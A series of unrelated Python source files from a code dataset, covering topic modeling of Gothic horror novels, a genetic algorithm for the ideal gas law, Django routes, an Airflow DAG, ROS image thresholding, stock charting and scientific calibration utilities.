SVM Linear Kernel, Cost = 1 CountVectorizer vectorization ------------------------\n#SVM_Model=LinearSVC(C=1)\n#bookSVM_Linear = SVM_Model.fit(Xbook_train, ybook_train)\n#storySVMPredict = SVM_Model.predict(predictVectorDF)\n\n# need to find another way to get data here ** JOYCE **\n#SVM_Model.predict_proba(predictVectorDF)\n#SVMLinear_CM = np.round(SVM_Model.predict_proba(predictVectorDF),2)\n\n#-------------------------------------- Plotting ------------------------------------------------\n# Plot non-normalized confusion matrix\n#plbls = predictLabelArray.tolist()\n#plt.figure(figsize=(20,20))\n# Plot normalized confusion matrix\n#my_plot_confusion_matrix_uneven(SVMLinear_CM, xclasses=lbls, yclasses=plbls, normalize = True,\n#                          title='Predicted Author (unseen) Confusion Matrix - Linear SVM\\nVectorization with CountVectorizer (Normalized)',\n#                          cmap=plt.cm.Reds)\n#plt.show()\n\n#### --------------------------------- LDA for Topic Modeling ---------------------------\n\n## implement a print function\n## REF: https://nlpforhackers.io/topic-modeling/\ndef print_topics(model, vectorizer, top_n=10):\n    for idx, topic in enumerate(model.components_):\n        print(\"Topic %d:\" % (idx))\n        print([(vectorizer.get_feature_names()[i], topic[i])\n                        for i in topic.argsort()[:-top_n - 1:-1]])\n        \n# Build the topic model using 6 topics\nlda_model = LatentDirichletAllocation(n_components=6, max_iter=10, learning_method='online')\nLDA_Model = lda_model.fit_transform(allbookVectorDF)\n\nprint(\"SIZE: \", LDA_Model.shape) # (NO_DOCUMENTS, NO_TOPICS)\n\n# Let's see what the first document in the corpus looks like in\n## different topic spaces\nprint(\"First Book in Gothic Horror Book Corpus...\")\nprint(LDA_Model[0])\nprint(\"Seventh Book in Gothic Horror Book Corpus...\")\nprint(LDA_Model[6])\n\n## Print LDA using print function from above\nprint(\"LDA Gothic Horror Book Model:\")\nprint_topics(lda_model, allbookCV)\n\n# print top 10 words for each topic\nfor i,topic in enumerate(lda_model.components_):\n    print(f'Top 10 words for topic #{i}:')\n    print([allbookCV.get_feature_names()[i] for i in topic.argsort()[-10:]])\n    print('\\n')\n\ntopic_values = lda_model.transform(allbookVectorDF)\ntopic_values.shape\n\n#------------------------------No stemming----------------------------------\n# topic matrix\n# Create Document — Topic Matrix\n#lda_output = best_lda_model.transform(data_vectorized)# column names\nlda_output = lda_model.transform(allbookVectorDF)\n#topicnames = [“Topic” + str(i) for i 
in range(best_lda_model.n_components)]# index names\ntopicnames = ['Topic' + str(i) for i in range(lda_model.n_components)]\n# this needs to be the booknames!!!!\n#docnames = ['Doc' + str(i) for i in range(len(data))]# Make the pandas dataframe\ndocnames = allbookLabel\n\nbooknames = []\nbook_list_array = allbookDF['book_name']\n\nfor book_name in book_list_array:\n #print(bname)\n bname = book_dict.get(book_name)\n booknames = booknames + [bname]\nlen(booknames)\n\ndf_document_topic = pd.DataFrame(np.round(lda_output, 2), columns=topicnames, index=docnames)# Get dominant topic for each document\n\ndominant_topic = np.argmax(df_document_topic.values, axis=1)\n\ndf_document_topic['dominant_topic'] = dominant_topic# Styling\ndf_document_topic['Book Name'] = booknames\nlen(df_document_topic)\ndf_document_topic.head(94)\n\nauthnames = []\nfor auth_name in allbookLabel:\n #print(bname)\n aname = predict_author_dict.get(auth_name)\n authnames = authnames + [aname]\n\n## JOYCE GENERATE WITHOUT FANCY COLORING!\nfancyDF = pd.DataFrame(np.round(lda_output, 2), columns=topicnames, index=docnames)\nfancyDF['dominant_topic'] = dominant_topic\nfancyDF['Author Name'] = authnames \nfancyDF['Book Name'] = booknames \nfancyDF = pd.DataFrame(fancyDF.set_index('Author Name'))\nwith pd.option_context('display.max_rows', None, 'display.max_columns', None): \n # more options can be specified also\n print(fancyDF)\n\n\ndef color_green(val):\n color = 'green' if val > .1 else 'black'\n return 'color: {col}'.format(col=color)\n\ndef make_bold(val):\n weight = 700 if val > .1 else 400\n return 'font-weight: {weight}'.format(weight=weight)# Apply Style\n\n#df_document_topics = df_document_topic.head(36).style.applymap(color_green).applymap(make_bold)\n#df_document_topics\n#display(df_document_topics)\n\n# Topic-Keyword Matrix\ndf_topic_keywords = pd.DataFrame(lda_model.components_)# Assign Column and Index\ndf_topic_keywords.columns = allbookCV.get_feature_names()\ndf_topic_keywords.index = topicnames# View\ndf_topic_keywords.head()\n\n\n# Show top n keywords for each topic\ndef show_topics(vectorizer=allbookCV, lda_model=lda_model, n_words=20):\n keywords = np.array(allbookCV.get_feature_names())\n topic_keywords = []\n for topic_weights in lda_model.components_:\n top_keyword_locs = (-topic_weights).argsort()[:n_words]\n topic_keywords.append(keywords.take(top_keyword_locs))\n return topic_keywords\n\ntopic_keywords = show_topics(vectorizer=allbookCV, lda_model=lda_model, n_words=15)# Topic - Keywords Dataframe\n\ndf_topic_keywords = pd.DataFrame(topic_keywords)\ndf_topic_keywords.columns = ['Word '+str(i) for i in range(df_topic_keywords.shape[1])]\ndf_topic_keywords.index = ['Topic '+str(i) for i in range(df_topic_keywords.shape[0])]\ndf_topic_keywords\n\n# so can see the entire dataframe\npd.set_option('display.max_rows', 1000)\n\n# for plotting\nfancyDF_melted = pd.melt(fancyDF, id_vars=[\"dominant_topic\"], ignore_index=False, \n value_vars=[\"Topic0\", \"Topic1\", \"Topic2\", \"Topic3\", \"Topic4\", \"Topic5\"])\nfancyDF_melted.head(36)\nlen(fancyDF_melted)\n# remove all 0' values\nfancyDF_melted = fancyDF_melted[(fancyDF_melted[['value']] != 0.00).all(axis=1)]\nlen(fancyDF_melted)\ndisplay(fancyDF_melted)\nwith pd.option_context('display.max_rows', None, 'display.max_columns', None): \n # more options can be specified also\n print(fancyDF_melted)\n\nsns.set_style(\"whitegrid\")\nplt.rcParams['figure.figsize']=16,8\n\nax = sns.scatterplot(data = fancyDF_melted, x = fancyDF_melted.index, y=\"value\", \n hue = 
'variable', palette = 'Set1', s=100)\n                     #size = 'value')\n\nplt.xticks(rotation=90, horizontalalignment = 'center', fontweight = 'light', fontsize = 'medium')\nplt.title(\"Dominant Topics for All Gothic Horror Books\", fontsize = 12)\nplt.legend(shadow=True, fancybox=True,loc='right', bbox_to_anchor = (1.1, 0.5)) \nplt.xlabel(\"Author Name\", fontsize = 10)\nplt.ylabel(\"Probability for Topic\", fontsize = 10)\n\n###------------------------------ How many Books per Topic -------------------------\n## Which topics have the most books?\n# count books by dominant topic\ntopicsDFbyBook = fancyDF_melted['dominant_topic'].value_counts()\n# convert to dataframe\ntopicsDFbyBook = topicsDFbyBook.to_frame()\n# index by topic number\ndominantNames = topicsDFbyBook.index.values\n# rename column to \"Books in Topic\"\ntopicsDFbyBook.columns = ['Books in Topic']\n\ntopicsDFbyBook['Topic Number'] = dominantNames\n\n# plot with seaborn\nfg = sns.catplot(x = \"Topic Number\", y = \"Books in Topic\", hue = \"Topic Number\", dodge=False,\n                height = 5, aspect = 2, palette=\"Spectral\", kind=\"bar\", data=topicsDFbyBook)\nfg.set_xticklabels(horizontalalignment = 'right', \n                   fontweight = 'light', fontsize = 'medium')\nfg.set(xlabel = \"Topic Number\", ylabel = \"Number of Books in Topic\", \n       title = \"Gothic Horror Authors by Topic - LDA Six Topics, no Stemming\")\n\n\n\n####################################################\n##\n## VISUALIZATION\n##\n####################################################\n\nimport pyLDAvis.sklearn as LDAvis\nimport pyLDAvis\n\n## conda install -c conda-forge pyldavis\n#pyLDAvis.enable_notebook() ## not using notebook\n# MyVectLDA_DH -> MyTxtCV\n# Vect_DH -> MyTxtDTM\n# CorpusDF_DH -> MyTxtDF\n\n#panel = LDAvis.prepare(lda_model_DH, Vect_DH, MyVectLDA_DH, mds='tsne')\npanel = LDAvis.prepare(lda_model, allbookDTM, allbookCV, mds='tsne')\n\n### !!!!!!! 
Important - you must interrupt and close the kernel in Spyder to end\n## In other words - press the red square and then close the small red x to close\n## the Console\npyLDAvis.show(panel)\n\n\n\n\n","sub_path":"IST736/code/Team_Goth_Projectv20.py","file_name":"Team_Goth_Projectv20.py","file_ext":"py","file_size_in_byte":95693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"406539334","text":"\"\"\"Author: Nguyen Thi Xuan Nguyen\nUPI: NUGN742\nStudent ID: 952236821\nCS320 A3-3\"\"\"\n\ndef sortTime(a_list):\n    return (a_list[0])\n\ndef main():\n    n = int(input())\n    for i in range(n):\n        line = input().split()\n        intervals = []\n        for k in range(0, len(line), 2):\n            intervals.append([int(line[k]), int(line[k+1])])\n\n        intervals = sorted(intervals, key = sortTime)\n\n        merge_in = [intervals[0]]\n        for item in intervals:\n            if item[0] > merge_in[-1][1]:\n                merge_in.append(item)\n            elif merge_in[-1][1] < item[1]:\n                merge_in[-1][1] = item[1]\n\n        result_list = []\n        for item in merge_in:\n            result_list.append(item[1] - item[0])\n\n        result = max(result_list)\n        print(result)\n\nmain()\n","sub_path":"Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"387652845","text":"from django.conf.urls import url\n\nurlpatterns = [\n    url(r'^$', 'pos.views.index', name='index'),\n    url(r'^products/$', 'pos.views.products', name='products'),\n    url(r'^product/(?P<product_id>[0-9]+)/$', 'pos.views.product', name='product'),\n    url(r'^cart/$', 'pos.views.get_cart', name='cart'),\n    url(r'^cart/get-total/$', 'pos.views.cart_total', name='cart_total'),\n    url(r'^cart/add/(?P<product_id>[0-9]+)/$', 'pos.views.add_to_cart', name='add_cart'),\n    url(r'^cart/update/$', 'pos.views.update_cart', name='update_cart'),\n    url(r'^cart/empty/$', 'pos.views.empty_cart', name='empty_cart'),\n    url(r'^cart/remove/(?P<product_id>[0-9]+)/$', 'pos.views.cart_remove', name='cart_remove'),\n    url(r'^cart/checkout/$', 'pos.views.checkout', name='checkout'),\n]\n","sub_path":"pos/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"505245716","text":"import random\r\n# In this code, we attempt to use genetic algorithms to find variables in an equation. Please note that this code isn't in its\r\n# final form and steps such as optimizing parameters or introducing reinforcement learning can help achieve perfect results.\r\n\r\n# Here given a value P i.e. pressure, we try to find V, n and T that lie in a boundary. This code uses the ideal gas equation\r\n# but can be changed for any equation. To get better values of the variables, run the code again and again.\r\n
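#\r\n# Worked example of the fitness measure defined below (illustrative numbers only):\r\n# with target P = 100 and an individual V=1, n=1, T=12, P_calc = (1*12*8.314)/1 = 99.77,\r\n# so fitness = P - P_calc = 0.23; a fitness near zero means the individual nearly\r\n# satisfies the ideal gas relation PV = nRT for the target pressure.\r\n\r\n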
def generate_pop(size,V_boundary,n_boundary,T_boundary):\r\n    V_lower_boundary, V_upper_boundary = V_boundary\r\n    n_lower_boundary, n_upper_boundary = n_boundary\r\n    T_lower_boundary, T_upper_boundary = T_boundary\r\n\r\n    population = []\r\n    for i in range(size):\r\n        individual = {\r\n            'V' : random.uniform(V_lower_boundary,V_upper_boundary),\r\n            'n': random.uniform(n_lower_boundary,n_upper_boundary),\r\n            'T': random.uniform(T_lower_boundary, T_upper_boundary)\r\n        }\r\n        population.append(individual)\r\n    return population\r\n\r\ndef function(individual,P):\r\n    \"\"\"Calculates how far an individual is from satisfying PV = nRT; also counts as fitness\"\"\"\r\n    V = individual['V']\r\n    n = individual['n']\r\n    T = individual['T']\r\n\r\n    P_calc = (n*T*8.314)/V  # R = 8.314 J/(mol*K)\r\n    fitness = P - P_calc\r\n    return fitness\r\n\r\ndef sort_pop_by_fitness(population, P):\r\n    sorted_pop = sorted(population, key=lambda individual: function(individual, P))\r\n    return sorted_pop\r\n\r\ndef crossover(sorted_pop):\r\n    # average the two fittest parents\r\n    individual_a = sorted_pop[-1]\r\n    individual_b = sorted_pop[-2]\r\n    Va = individual_a['V']\r\n    na = individual_a['n']\r\n    Ta = individual_a['T']\r\n\r\n    Vb = individual_b['V']\r\n    nb = individual_b['n']\r\n    Tb = individual_b['T']\r\n\r\n    return {'V': (Va + Vb) / 2, 'n': (na + nb) / 2, 'T': (Ta + Tb) / 2}\r\n\r\ndef mutation(individual,V_boundary,n_boundary,T_boundary):\r\n    next_V = individual['V'] + random.uniform(-0.5, 0.5)\r\n    next_n = individual['n'] + random.uniform(-0.3, 0.3)\r\n    next_T = individual['T'] + random.uniform(-10, 10)\r\n\r\n    V_lower_boundary, V_upper_boundary = V_boundary\r\n    n_lower_boundary, n_upper_boundary = n_boundary\r\n    T_lower_boundary, T_upper_boundary = T_boundary\r\n    # Guarantee it stays within the boundaries\r\n    next_V = min(max(next_V,V_lower_boundary), V_upper_boundary)\r\n    next_n = min(max(next_n, n_lower_boundary), n_upper_boundary)\r\n    next_T = min(max(next_T, T_lower_boundary), T_upper_boundary)\r\n\r\n    return {'V': next_V, 'n': next_n, 'T' : next_T}\r\n\r\ndef make_next_gen(previous_population, P, V_boundary, n_boundary, T_boundary):\r\n    next_gen = []\r\n    pop_size = len(previous_population)\r\n\r\n    for i in range(pop_size):\r\n        individual = crossover(sort_pop_by_fitness(previous_population, P))\r\n        individual = mutation(individual, V_boundary, n_boundary, T_boundary)\r\n        next_gen.append(individual)\r\n    return next_gen\r\n\r\ngenerations = 10000\r\n\r\npopulation = generate_pop(size=30, V_boundary=(1, 10), n_boundary=(0.1, 10), T_boundary= (1, 100))\r\ni = 1\r\nP = 100\r\nbest_scores = []\r\nwhile True:\r\n    print('Generation:', i)\r\n    for individual in population:\r\n        print(individual)\r\n        print(function(individual,P))\r\n        if function(individual, P) == 0:\r\n            print('The solution is:', individual)\r\n            break\r\n        elif (function(individual, P) >= -10) and (function(individual, P) <= 20):\r\n            print('The solution is close to :', function(individual, P), 'The variables are:', individual)\r\n            break\r\n    # evolve the population before the next generation\r\n    population = make_next_gen(population, P, (1, 10), (0.1, 10), (1, 100))\r\n    i = i+1\r\n    if i == generations:\r\n        break\r\n\r\n","sub_path":"Genetic algorithm - Ideal gas.py","file_name":"Genetic algorithm - Ideal gas.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"629880025","text":"import gym\nimport pybullet_envs # noqa: F401\nimport pytest\nfrom stable_baselines3.common.env_checker import check_env\n\nfrom utils.utils import get_wrapper_class\nfrom utils.wrappers import ActionNoiseWrapper, DelayedRewardWrapper, HistoryWrapper, TimeFeatureWrapper\n\n\ndef test_wrappers():\n    env = 
gym.make(\"HalfCheetahBulletEnv-v0\")\n env = DelayedRewardWrapper(env)\n env = ActionNoiseWrapper(env)\n env = HistoryWrapper(env)\n env = TimeFeatureWrapper(env)\n check_env(env)\n\n\n@pytest.mark.parametrize(\n \"env_wrapper\",\n [\n None,\n {\"utils.wrappers.HistoryWrapper\": dict(horizon=2)},\n [{\"utils.wrappers.HistoryWrapper\": dict(horizon=3)}, \"utils.wrappers.TimeFeatureWrapper\"],\n ],\n)\ndef test_get_wrapper(env_wrapper):\n env = gym.make(\"HalfCheetahBulletEnv-v0\")\n hyperparams = {\"env_wrapper\": env_wrapper}\n wrapper_class = get_wrapper_class(hyperparams)\n if env_wrapper is not None:\n env = wrapper_class(env)\n check_env(env)\n","sub_path":"rl-baselines3-zoo/tests/test_wrappers.py","file_name":"test_wrappers.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"615926101","text":"# coding: utf-8\n#\n# This file is part of Sequana software\n#\n# Copyright (c) 2016 - Sequana Development Team\n#\n# File author(s):\n# Thomas Cokelaer \n# Dimitri Desvillechabrol ,\n# \n#\n# Distributed under the terms of the 3-clause BSD license.\n# The full license is in the LICENSE file, distributed with this software.\n#\n# website: https://github.com/sequana/sequana\n# documentation: http://sequana.readthedocs.io\n#\n##############################################################################\n\"\"\"Module to write coverage report\"\"\"\nimport os\nimport glob\nimport io\n\nfrom sequana.modules_report.base_module import SequanaBaseModule\nfrom sequana.utils import config\n\nfrom sequana.lazy import pandas as pd\nfrom sequana.lazy import pylab\nfrom sequana import logger, sequana_data\n\nfrom sequana.utils.datatables_js import DataTable\n\n\nclass KrakenModule(SequanaBaseModule):\n \"\"\" Write HTML report of Kraken results\"\"\"\n def __init__(self, input_directory, output_filename=None):\n \"\"\"\n :param input_directory: the directory of the bwa_bam_to_fastq output\n :param output_filename: if not provided, the HTML is not created.\n\n \"\"\"\n super().__init__()\n self.title = \"Kraken report\"\n self.directory = input_directory\n self.create_report_content()\n if output_filename:\n self.create_html(output_filename)\n\n def create_report_content(self):\n \"\"\" Generate the sections list to fill the HTML report.\n \"\"\"\n self.sections = list()\n self.add_summary_section()\n\n def _get_stats(self):\n df = pd.read_csv(self.directory + os.sep + \"kraken.csv\")\n return df\n\n def _get_summary_section(self):\n\n\n df = self._get_stats()\n if len(df) == 1 and df.iloc[0]['taxon'] == -1:\n pngimage = sequana_data(\"no_data.jpg\")\n extra = \"
no reads could be identified with the given database(s).\"\n        else:\n            pngimage = self.directory + os.sep + \"kraken.png\"\n            extra = \"\"\"<p>The following clickable image is a simplified \nversion (only genus are shown) of an interactive and more detailed version \nbased on Krona. Finally, note that the unclassified species in the pie plot \nmay correspond to species not present in the database or adapters (if not \nremoved).</p>\n    \"\"\"\n\n        html = \"\"\"\n    <p>Overview of the Taxonomic content of the filtered reads.</p>\n    \n    <p>The taxonomic analysis is performed with Kraken (see database name in \nthe configuration file). The analysis is performed with a Kmer\napproach.\nThe details about the database itself are available in the Sequana documentation.\nThe taxonomic analysis should give a good idea of the content of the FastQ\nfiles but should be used as a sanity check. Indeed, species absent\nfrom the database won't be detected leading to false detection (close species \nmay be detected instead). \nBesides, be aware that closely related species may not be classified precisely.\n    </p>\n\n        {0}\n        <a href=\"{1}/kraken.html\">{2}</a>\n    \n\"\"\".format(extra, self.directory.split(os.sep, 1)[1], \n            self.png_to_embedded_png(pngimage))\n\n        
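# build a sortable datatable from the per-taxon dataframe; when an 'ena'\n        # accession column is present, each accession is linked to the EBI ENA\n        # browser via the url set just below\n        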
datatable = DataTable(df, \"kraken\", index=False)\n        # add links\n        if \"ena\" in df.columns:\n            urlena = \"http://www.ebi.ac.uk/ena/data/view/\"\n            datatable.datatable.set_links_to_column(\"ena\",\n                [urlena + this for this in df['ena']])\n        datatable.datatable.datatable_options = {\n            'scrollX': '300px',\n            'pageLength': 30,\n            'scrollCollapse': 'true',\n            'dom': 'irtpB',\n            \"paging\": \"false\",\n            \"order\": [[ 2, \"desc\"]],\n            'buttons': ['copy', 'csv']}\n        js = datatable.create_javascript_function()\n        html_tab = datatable.create_datatable(float_format='%.3g')\n\n        html += \"{} {}\".format(html_tab, js)\n        \"\"\"# Rounding and convert in string to avoid exp notation\n        df['percentage'] = df['percentage'].apply(lambda x: str(round(x,4)))\n        #self.jinja['kraken_json'] = df.to_json()\"\"\"\n\n        return html\n\n    def add_summary_section(self):\n        html = self._get_summary_section()\n        self.sections.append({\n            \"name\": \"Taxonomic content\",\n            \"anchor\": \"kraken\",\n            \"content\": html\n        })\n\n","sub_path":"sequana/modules_report/kraken.py","file_name":"kraken.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"301312443","text":"p=int(input(\"Max multiplier :\"))\r\nnum_arr=set()\r\nfor i in range (p,1,-1):\r\n    num_arr.add(i)\r\n    if (i<=(p/2)):\r\n        for I in range (2*i,p+1,i):\r\n            num_arr.discard(I)\r\nmaxnum=1\r\nprint(num_arr)\r\n\r\nfor i in list(num_arr):\r\n    j=i\r\n    while True:\r\n        if i*j<=p:\r\n            i=i*j\r\n        else:\r\n            break\r\n    print(i)    \r\n    maxnum=maxnum*i\r\nprint(maxnum)\r\n","sub_path":"005/PE005.py","file_name":"PE005.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"282089329","text":"# -*- coding: utf-8 -*-\nimport yfinance as yf\nimport mplfinance as fplt\n\ndef draw_candle_chart( stock_id ):\n    stock_id = str( stock_id ) + \".TW\" # Yahoo Finance tickers for Taiwan stocks are the local code + .TW\n    data = yf.Ticker( stock_id ) # fetch the data\n    \n    # 1mo = 1 month; 'max' downloads the full available history\n    ohlc = data.history( period=\"2mo\" )\n    ohlc = ohlc.loc[ :, [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"] ] # keep only the columns needed for plotting (open/high/low/close/volume)\n    \n    # adjust the chart marker colors\n    mc = fplt.make_marketcolors(\n        up = 'tab:red',down = 'tab:green', # up days red, down days green\n        wick = {'up':'red','down':'green'}, # wicks: red when up, green when down\n        volume = 'tab:green', # volume bar color\n    )\n    \n    s = fplt.make_mpf_style( marketcolors = mc ) # define the chart style\n    \n    fplt.plot(\n        ohlc, # the OHLCV data\n        type = 'candle', # candlestick (K-line) chart\n        style = s, # apply the chart style\n        title = stock_id, # set the chart title\n        ylabel = 'Price ($)', # set the Y-axis label\n        volume = True,\n        savefig='stock_Kbar.png', # save to file\n    )\n    #fplt.show()\nif __name__ == \"__main__\":\n    draw_candle_chart( 1101 )","sub_path":"程式交易實作/禮拜一的課/主任上課範例_table/1. yahoo_funance 下載股票資料/3. 繪製圖表.py","file_name":"3. 
繪製圖表.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"310640260","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport sys\nimport rospy\nimport cv2\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\ndef nothing(x):\n pass\n\nclass threshhold_determination:\n def __init__(self):\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"image_topic\",Image,self.callback)\n \n self.thresh=100\n cv2.namedWindow('CameraView') \n cv2.createTrackbar('Threshhold:', 'CameraView',0,255,nothing)\n def callback(self,data):\n #Convert the ROS image to a cv2 image\n try:\n img = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n \n self.thresh = cv2.getTrackbarPos('Threshhold:','CameraView')\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) \n ret, thresh_img = cv2.threshold(gray_img, self.thresh, 255, cv2.THRESH_BINARY) #84\n thresh_img = cv2.blur(thresh_img, (11,11))\n cv2.imshow(\"CameraView\",img)\n cv2.imshow(\"ThreshholdImage\",thresh_img)\n\n cv2.waitKey(3)\n \n########################################################################## \n \ndef main(args):\n td = threshhold_determination()\n rospy.init_node('ThresholdDet', anonymous=True)\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\nif __name__ == '__main__':\n main(sys.argv) \n \n","sub_path":"product_detection/nodes/ThresholdTop.py","file_name":"ThresholdTop.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"299828910","text":"import uuid\nimport time\n\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.postgres_operator import PostgresOperator\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nfrom airflow.operators.postgres_custom import CountRowsOperator\n\n\ndef create_dag(dag_id, schedule, table_name, default_args):\n\n def print_log(dag_id, database):\n print(f'{dag_id} start processing tables in database: {database}')\n\n def check_table_exist(schema_name, table_name):\n \"\"\"method to check that table exist\"\"\"\n hook = PostgresHook()\n check_schema_sql = 'SELECT schema_name ' \\\n 'FROM information_schema.schemata ' \\\n f'WHERE schema_name=\\'{schema_name}\\''\n\n check_table_sql = 'SELECT table_name FROM information_schema.tables ' \\\n f'WHERE table_schema=\\'{schema_name}\\' '\\\n f'AND table_name=\\'{table_name}\\';'\n\n schema = hook.get_first(check_schema_sql)\n if not schema:\n raise ValueError(f'Schema {schema_name} not found!')\n\n table = hook.get_first(check_table_sql)\n if table:\n print(f'Table {schema_name}.{table_name} found!')\n return 'skip_table_creation'\n print(f'Table {schema_name}.{table_name} not found!')\n return 'create_table'\n\n def query_table(**kwargs):\n hook = PostgresHook()\n sql = f'SELECT COUNT(*) FROM {table_name}'\n result = hook.get_first(sql)\n return result\n\n dag = DAG(dag_id, catchup=False, schedule_interval=schedule,\n default_args=default_args)\n\n with dag:\n print_log_task = PythonOperator(\n task_id='print_log',\n python_callable=print_log,\n 
op_kwargs={'dag_id': dag_id, 'database': table_name},\n dag=dag\n )\n\n get_user_task = BashOperator(\n task_id='get_user',\n # bash_command='echo $USER', # mock user with constant\n bash_command='echo airflow',\n xcom_push=True,\n dag=dag\n )\n\n check_table_task = BranchPythonOperator(\n task_id='check_table',\n python_callable=check_table_exist,\n op_args=[schema_name, table_name],\n dag=dag\n )\n\n create_table_task = PostgresOperator(\n task_id='create_table',\n sql=f'CREATE TABLE {table_name} ('\n f'id UUID NOT NULL, '\n f'\"user\" VARCHAR(50) NOT NULL, '\n f'\"timestamp\" TIMESTAMP NOT NULL);',\n dag=dag\n )\n\n skip_table_creation_task = DummyOperator(\n task_id='skip_table_creation',\n dag=dag\n )\n\n insert_row_task = PostgresOperator(\n task_id='insert_new_row',\n sql=f\"INSERT INTO {table_name} VALUES (\"\n f\"'{uuid.uuid4()}',\"\n \"'{{ task_instance.xcom_pull(task_ids='get_user') }}',\"\n f\"'{datetime.now()}');\",\n dag=dag,\n trigger_rule='all_done'\n )\n\n query_table_task = CountRowsOperator(\n task_id='query_the_table',\n table_name=table_name,\n provide_context=True,\n dag=dag\n )\n\n print_log_task >> get_user_task >> check_table_task\n check_table_task >> create_table_task >> insert_row_task\n check_table_task >> skip_table_creation_task >> insert_row_task\n insert_row_task >> query_table_task\n\n return dag\n\n\nfor i in range(1, 4):\n dag_id = f'dag_id_{i}'\n schedule = None\n schema_name = 'public'\n table_name = f'table_{i}'\n default_args = {\n 'owner': 'iistomin',\n 'start_date': datetime(2018, 11, 11)\n }\n\n globals()[dag_id] = create_dag(dag_id, schedule, table_name, default_args)\n","sub_path":"dags/jobs_dag.py","file_name":"jobs_dag.py","file_ext":"py","file_size_in_byte":4082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"3268576","text":"import sys, re\nr = sys.stdin.readlines\n\nword = ''\nlength = 0\nlines = r()\nfor line in lines:\n\tline = re.sub('[^-a-zA-Z]+', ' ', line)\n\tline = line.rstrip().split()\n\tfor j, l in enumerate(map(len, line)):\n\t\tif l > length:\n\t\t\tlength = l\n\t\t\tword = line[j].lower()\n\nprint(word)","sub_path":"5000/05637_baekjoon.py","file_name":"05637_baekjoon.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"580053044","text":"#!/usr/bin/env python\n#------------------------------------------------------------------------\n# File and Version Information:\n# $Id$\n#\n# Description:\n# Module ex_cspad_img...\n#\n#------------------------------------------------------------------------\n\n\"\"\"This module provides an examples of how to get and plot CSPad image\n\nThis software was developed for the SIT project. If you use all or \npart of it, please give an appropriate acknowledgment.\n\n@see PyCSPadImage.CalibPars, PyCSPadImage.CSPADPixCoords\n\n@version $Id: 2014-07-02$\n\n@author Mikhail S. 
Dubrovin\n\"\"\"\nfrom __future__ import print_function\n\n#------------------------------\n# Module's version from CVS --\n#------------------------------\n__version__ = \"$Revision$\"\n# $Source$\n\n#----------\n# Imports \n#----------\nimport os\nimport sys\nimport numpy as np\n\nimport PyCSPadImage.CalibPars as calp\n\nfrom PSCalib.CalibFileFinder import CalibFileFinder\n\n#------------------------------\n\ndef test_01() :\n \"\"\" Test of access to calibration file\n \"\"\"\n path_to_clib_types = '/reg/d/psdm/xpp/xppi0815/calib/CsPad::CalibV1/XppGon.0:Cspad.0'\n runnum = 120\n type = 'pedestals'\n print(' path_to_clib_types: %s\\n type: %s\\n runnum: %d' % (path_to_clib_types, type, runnum))\n\n #calibstore = calp.CalibPars(path=path_calib, run=runnum)\n #pedestals = calibstore.getCalibPars('pedestals', runnum)\n\n fname = calp.findCalibFile(path_to_clib_types, type, runnum) \n print(' calibration file name: %s' % fname)\n\n#------------------------------\n\ndef test_02() :\n \"\"\" Test of access to calibration file\n \"\"\"\n\n cdir = '/reg/d/psdm/xpp/xppi0815/calib'\n group = 'CsPad::CalibV1'\n src = 'XppGon.0:Cspad.0'\n type = 'pedestals'\n rnum = 120\n\n print(' cdir: %s\\n type: %s\\n runnum: %d' % (cdir, type, rnum))\n\n cff = CalibFileFinder(cdir, group, pbits=0o377)\n fname = cff.findCalibFile(src, type, rnum)\n\n print(' calibration file name: %s' % fname)\n\n \n#------------------------------\n\nif __name__ == \"__main__\" :\n if len(sys.argv) <2 : test_01()\n elif sys.argv[1] == '1' : test_01()\n elif sys.argv[1] == '2' : test_02()\n sys.exit ( 'End of %s' % sys.argv[0] )\n\n#------------------------------\n","sub_path":"src/ex_find_calib_file.py","file_name":"ex_find_calib_file.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"232069020","text":"# Python ≥3.5 is required\nimport sys\nassert sys.version_info >= (3, 5)\n\n# Scikit-Learn ≥0.20 is required\nimport sklearn\nassert sklearn.__version__ >= \"0.20\"\n\n# try:\n# # %tensorflow_version only exists in Colab.\n# %tensorflow_version 2.x\n# except Exception:\n# pass\n\n# TensorFlow ≥2.0 is required\nimport 